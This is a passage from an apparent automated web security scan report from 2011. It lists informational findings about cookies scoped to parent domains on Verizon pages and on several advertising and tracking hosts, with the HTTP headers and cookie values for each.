TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:42 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.18. https://enterprisecenter.verizon.com/enterprisesolutions/selfreg/submitEnrollmentProfileInfo.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/selfreg/submitEnrollmentProfileInfo.do

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:35:23 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html
Location: https://www22.verizon.com/ifederation/SmMakeCookie.ccc?SMSESSION=QUERY&PERSIST=0&TARGET=$SM$https%3a%2f%2fenterprisecenter%2everizon%2ecom%2fenterprisesolutions%2fselfreg%2fsubmitEnrollmentProfileInfo%2edo
Vary: accept-encoding
Expires: Mon, 05 Sep 2011 22:35:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:35:23 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:35:23 GMT
Content-Length: 0

14.19. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_VEC_Main.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_VEC_Main.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:44 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.20. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_VEC_Popup.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_VEC_Popup.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:40:48 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.21. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_Vz_Main.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_Vz_Main.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:44 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.22. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_Vz_Popup.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_Vz_Popup.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:40:48 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.23. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_1px.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_1px.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:45 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.24. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_left.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_left.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:45 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.25. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_right.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_right.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:45 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.26. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/box_gradient.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/box_gradient.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:45 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.27. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/btn_Forms.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/btn_Forms.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:24 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.28. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/btn_close.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/btn_close.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:26 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.29. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/button_default_left.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/button_default_left.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:46 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.30. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/button_default_right.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/button_default_right.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:46 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.31. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/button_left.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/button_left.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:45 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.32. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/button_right.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/button_right.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:46 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.33. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/dropdownMenu.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/dropdownMenu.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:43 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.34. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/footer_1px.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/footer_1px.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:44 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.35. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/header_gray_left.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/header_gray_left.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:44 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.36. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/header_gray_right.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/header_gray_right.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:44 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.37. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/header_red_left.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/header_red_left.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:26 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.38. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/header_red_right.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/header_red_right.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:26 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 334
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "14e-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7146
Date: Mon, 05 Sep 2011 22:25:26 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:26 GMT

GIF89a
....................................................................................................((.==.FF.HH................................................................................
...[SNIP]...

14.39. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/pattern_library/i/s.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/pattern_library/i/s.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:46 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.40. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/icn_HelpLarge.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/icn_HelpLarge.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:40:49 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.41. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/icn_errorMssg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/icn_errorMssg.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:17 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.42. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/icn_video.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/icn_video.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:40:49 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.43. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/s.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/s.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:43 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.44. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/tooltip_button.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/tooltip_button.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:25 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.45. https://enterprisecenter.verizon.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:22 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.46. http://forums.verizon.com/t5/FiOS-Internet/Need-webmail-contacts-CSV-titles/td-p/23248 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.verizon.com
Path:	/t5/FiOS-Internet/Need-webmail-contacts-CSV-titles/td-p/23248

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

VISITORID=1597650297; Domain=.verizon.com; Expires=Fri, 05-Sep-2014 16:09:13 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.47. http://g-pixel.invitemedia.com/gmatcher previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://g-pixel.invitemedia.com
Path:	/gmatcher

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

exchange_uid=eyIyIjogWyI3ODYxMjY3NDUwNTIyMTIwMTc4IiwgNzM0MzUyXSwgIjQiOiBbIkNBRVNFRGxwczBXRFF6TF9zR0NPQ2RlekdZTSIsIDczNDM4NV19; Domain=invitemedia.com; expires=Tue, 04-Sep-2012 22:14:41 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.48. http://get.adobe.com/flashplayer/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://get.adobe.com
Path:	/flashplayer/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SETTINGS.LOCALE=en%5Fus;domain=.adobe.com;expires=Wed, 28-Aug-2041 22:20:21 GMT;path=/cfusion/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.49. http://idcs.interclick.com/Segment.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://idcs.interclick.com
Path:	/Segment.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

sgm=7435=734382&7980=734355&7596=734356&8629=734382&6376=734377&508=734383&11095=734384; domain=.interclick.com; expires=Sun, 05-Sep-2021 22:14:39 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.50. http://leadback.advertising.com/adcedge/lb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://leadback.advertising.com
Path:	/adcedge/lb

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ACID=optout!; domain=advertising.com; expires=Wed, 04-Sep-2013 22:16:10 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.51. http://leadback.advertising.com/adcedge/lb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://leadback.advertising.com
Path:	/adcedge/lb

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=OnUZOBbfB0zjG7ZhrCQcHWgVSKsBdbdxgZAmoZMYi+iBezixglLuHYRxGbUkAfwuRXkR0udBT7qR0/1IzaE9hahBdPixgFbPIsOlGAnq8YQgkZUYT+9B5ydhWmLcIoCxGrA; domain=advertising.com; expires=Wed, 04-Sep-2013 22:14:38 GMT; path=/
GUID=MTMxNTI2MDg3ODsxOjE3Mmpta2gxN2cxMHJzOjM2NQ; domain=advertising.com; expires=Wed, 04-Sep-2013 22:14:38 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.52. https://mblogin.verizonwireless.com/amserver/UI/Login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mblogin.verizonwireless.com
Path:	/amserver/UI/Login

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

AMAuthCookie=AQIC5wM2LY4SfcxncLgqljU9ptuqlsilHWOLxrcjydR8SCc%3D%40AAJTSQACMjMAAlMxAAJvMQ%3D%3D%23;Domain=.verizonwireless.com;Path=/;Secure
SD=CARTCTR%3D0;Domain=.verizonwireless.com;Expires=Thu, 01-Jan-1970 00:00:10 GMT;Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /amserver/UI/Login HTTP/1.1
Host: mblogin.verizonwireless.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.53. http://media.verizon.com/media/XmlProxy.ashx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.verizon.com
Path:	/media/XmlProxy.ashx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=KQfyhK9qeUc=&H=&I=&J=JxCF029RF/U=; domain=verizon.com; expires=Wed, 07-Sep-2011 22:41:50 GMT; path=/media

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.54. http://media.verizon.com/media/scripts/widget.ashx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.verizon.com
Path:	/media/scripts/widget.ashx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=&J=; domain=verizon.com; expires=Wed, 07-Sep-2011 22:41:23 GMT; path=/media

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/javascript; charset=utf-8
Content-Length: 143025
Date: Mon, 05 Sep 2011 22:41:49 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=&J=; domain=verizon.com; expires=Wed, 07-Sep-2011 22:41:23 GMT; path=/media

/* widget.ashx code generated : 9/5/2011 10:41:23 PM; valid until: 9/5/2011 5:42:21 PM */
var vzWidgetsBaseURI = 'http://media.verizon.com/media',
vzWidgetsSignedIn = false;

/* files consolidated
...[SNIP]...

14.55. http://pixel.mathtag.com/event/img previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.mathtag.com
Path:	/event/img

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ts=1315260879; domain=.mathtag.com; path=/; expires=Tue, 04-Sep-2012 22:14:39 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.56. http://r.turn.com/r/beacon previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/r/beacon

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uid=9033442320916087634; Domain=.turn.com; Expires=Sat, 03-Mar-2012 22:14:41 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=9033442320916087634; Domain=.turn.com; Expires=Sat, 03-Mar-2012 22:14:41 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 05 Sep 2011 22:14:40 GMT

GIF89a.............!.......,...........D..;

14.57. http://s.xp1.ru4.com/click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s.xp1.ru4.com
Path:	/click

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

X1ID=BC-00000000964218310; domain=.ru4.com; path=/; expires=Mon, 05-Mar-2013 18:19:21 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.58. http://s.xp1.ru4.com/meta previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s.xp1.ru4.com
Path:	/meta

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

997910-B997917=0|0|0|0|0|997915|997914|-1; domain=.ru4.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.59. http://s.xp1.ru4.com/meta previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s.xp1.ru4.com
Path:	/meta
